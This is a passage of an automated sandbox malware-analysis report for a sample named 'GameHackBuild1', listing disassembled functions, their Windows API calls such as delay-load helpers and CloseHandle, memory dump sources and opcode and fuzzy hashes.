                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8ed88764a7271fb3bd1f8b3206afceaf3a0aec6b08624ceb4f081050e543e894
                                      • Instruction ID: 382bf7dff3a681c6c80096f0c31107bdebc7a4bcd408a214e1af25703a0194d4
                                      • Opcode Fuzzy Hash: 8ed88764a7271fb3bd1f8b3206afceaf3a0aec6b08624ceb4f081050e543e894
                                      • Instruction Fuzzy Hash: AFA001A66BD502BC710C6251AE56DBA022ED9C6BA17708D1AB54BA40C1A990698A5831
                                      Function 00A1DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8fb9c4f045a98b345d333e4a6b03a9efea09460bb1652f7651bb3c36068fe9e6
                                      • Instruction ID: 8f7e898b3a415174ec30bbd2154c361e54fde401779f2080b8694af8fae788ca
                                      • Opcode Fuzzy Hash: 8fb9c4f045a98b345d333e4a6b03a9efea09460bb1652f7651bb3c36068fe9e6
                                      • Instruction Fuzzy Hash: 1BA002A527D5017C7148B151AE16D7B025DD4D1B51734491AB50694045555459855431
                                      Function 00A1DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: f75fa285935c693045187447f2a6f123740467984baafc49966c4f88e7d12d73
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: f75fa285935c693045187447f2a6f123740467984baafc49966c4f88e7d12d73
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      Function 00A1DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 788e6912ee4d0941044e676f6d188450aafd55dc489271f8ae1550ffe9db893b
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: 788e6912ee4d0941044e676f6d188450aafd55dc489271f8ae1550ffe9db893b
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      Function 00A1DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 2a1fa674a91dec0e90ab77e960eb6c88f086224da595ada29479323f03532090
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: 2a1fa674a91dec0e90ab77e960eb6c88f086224da595ada29479323f03532090
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      Function 00A1DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: bdfcdbc073796fed75db332c21837a017d011e7d4e27753df4922e9a7f76e74b
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: bdfcdbc073796fed75db332c21837a017d011e7d4e27753df4922e9a7f76e74b
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      Function 00A1DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: bcd862ecd31eaa7c7f27eb66b3b7a1eda9f10a4f57c626ebfcbd7742aae180e3
                                      • Instruction ID: 8d6167476a1d5a39d9ee78aa28ec44e94439a26bac86ea28140546c7f4620826
                                      • Opcode Fuzzy Hash: bcd862ecd31eaa7c7f27eb66b3b7a1eda9f10a4f57c626ebfcbd7742aae180e3
                                      • Instruction Fuzzy Hash: 52A001A62BD102BC7108B252AE26DBB026DD8C5BA17348E1AB50A98089A994598A5831
                                      Function 00A1DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: a8ecbd385f85527cab6df1569f680b420e7089925648e5b826804cdebe7fabc2
                                      • Instruction ID: 0ca0965ee7124b72badc543def3459e70e8b6616ab6aa40c85a4ec7f589d30c5
                                      • Opcode Fuzzy Hash: a8ecbd385f85527cab6df1569f680b420e7089925648e5b826804cdebe7fabc2
                                      • Instruction Fuzzy Hash: 49A001AA2BD106BC710862596E1BDFA022DE4C5BA17318D1AB60B94081AA905D8A5431
                                      Function 00A1DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cc59e51ff3eba28372a68b9c69b45577b710fce505498b44802b8519685986d2
                                      • Instruction ID: 0ca0965ee7124b72badc543def3459e70e8b6616ab6aa40c85a4ec7f589d30c5
                                      • Opcode Fuzzy Hash: cc59e51ff3eba28372a68b9c69b45577b710fce505498b44802b8519685986d2
                                      • Instruction Fuzzy Hash: 49A001AA2BD106BC710862596E1BDFA022DE4C5BA17318D1AB60B94081AA905D8A5431
                                      Function 00A1DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cfdd506c85ab079e3a13108a9bf3dbf87f974567f4ca9b29eddf0316e3290390
                                      • Instruction ID: 0ca0965ee7124b72badc543def3459e70e8b6616ab6aa40c85a4ec7f589d30c5
                                      • Opcode Fuzzy Hash: cfdd506c85ab079e3a13108a9bf3dbf87f974567f4ca9b29eddf0316e3290390
                                      • Instruction Fuzzy Hash: 49A001AA2BD106BC710862596E1BDFA022DE4C5BA17318D1AB60B94081AA905D8A5431
                                      Function 00A1DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: aa7ee4b3cf7b22c8a7653c82594dc2c5d4fd62f2f8ab11dc0ec7cee324fecbd0
                                      • Instruction ID: 0ca0965ee7124b72badc543def3459e70e8b6616ab6aa40c85a4ec7f589d30c5
                                      • Opcode Fuzzy Hash: aa7ee4b3cf7b22c8a7653c82594dc2c5d4fd62f2f8ab11dc0ec7cee324fecbd0
                                      • Instruction Fuzzy Hash: 49A001AA2BD106BC710862596E1BDFA022DE4C5BA17318D1AB60B94081AA905D8A5431
                                      Function 00A1DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6aafb6ed28c9f59b2222bcdb55c810579ad1a8472d93531df599c7bb96f29f40
                                      • Instruction ID: 5c4fd7f4a66127c6f3210b5feca7babde4cdf4f818420542d52662db57a841cc
                                      • Opcode Fuzzy Hash: 6aafb6ed28c9f59b2222bcdb55c810579ad1a8472d93531df599c7bb96f29f40
                                      • Instruction Fuzzy Hash: 87A001BA6BD202BCB14C62656E16EBA022DD4C5B617308D1AB60AA4091AA806D8A9871
                                      Function 00A1DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b89c3f219f9e99434245f81c4582d2e8252e2494e3d3c62131f0452bd08c9f59
                                      • Instruction ID: 5c4fd7f4a66127c6f3210b5feca7babde4cdf4f818420542d52662db57a841cc
                                      • Opcode Fuzzy Hash: b89c3f219f9e99434245f81c4582d2e8252e2494e3d3c62131f0452bd08c9f59
                                      • Instruction Fuzzy Hash: 87A001BA6BD202BCB14C62656E16EBA022DD4C5B617308D1AB60AA4091AA806D8A9871
                                      Function 00A09EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEndOfFile.KERNELBASE(?,00A09104,?,?,-00001964), ref: 00A09EC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File
                                      • String ID:
                                      • API String ID: 749574446-0
                                      • Opcode ID: a62a02537bdd2b6e53cc6e17889d8906716a05797fff6d079f55e7e861df4207
                                      • Instruction ID: d6ee877380d48f1b8e5521ee376731b6c1b1e314a6c0465af932c4cc35db8bea
                                      • Opcode Fuzzy Hash: a62a02537bdd2b6e53cc6e17889d8906716a05797fff6d079f55e7e861df4207
                                      • Instruction Fuzzy Hash: 96B011320AA00A8A8E002B30CE088283A20EA2230A30082A0B002CA0A0CB22C003AA00
                                      Function 00A1A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?,00A1A587,C:\Users\user\Desktop,00000000,00A4946A,00000006), ref: 00A1A326
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: 296fcf20f9a0f02a345ab7693a16727f0fbdd7bc27f510b06d1457c934804ac5
                                      • Instruction ID: 457fe42abedc1826c9b0e7db48abce9c018f49138294111c1656f534ea56a2c5
                                      • Opcode Fuzzy Hash: 296fcf20f9a0f02a345ab7693a16727f0fbdd7bc27f510b06d1457c934804ac5
                                      • Instruction Fuzzy Hash: 2AA01231198006568E004B30CC09C1576505760703F0087207002C00A0CB308814A500
                                      Function 00A096D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNELBASE(000000FF,?,?,00A0968F,?,?,?,?,00A31FA1,000000FF), ref: 00A096EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 3fc09bd321222fcf2b4ca95bad54087eddac1e80eb7b56a0c19bdb17f11bc376
                                      • Instruction ID: a063fbbf4c725db6c6782e4d04ba4dc2931844f80f3a0fae426a300222f6d049
                                      • Opcode Fuzzy Hash: 3fc09bd321222fcf2b4ca95bad54087eddac1e80eb7b56a0c19bdb17f11bc376
                                      • Instruction Fuzzy Hash: 41F05E31556B188FDB308B24EAA8793B7E49B12725F048B1E91EB434E1A766685D9B00

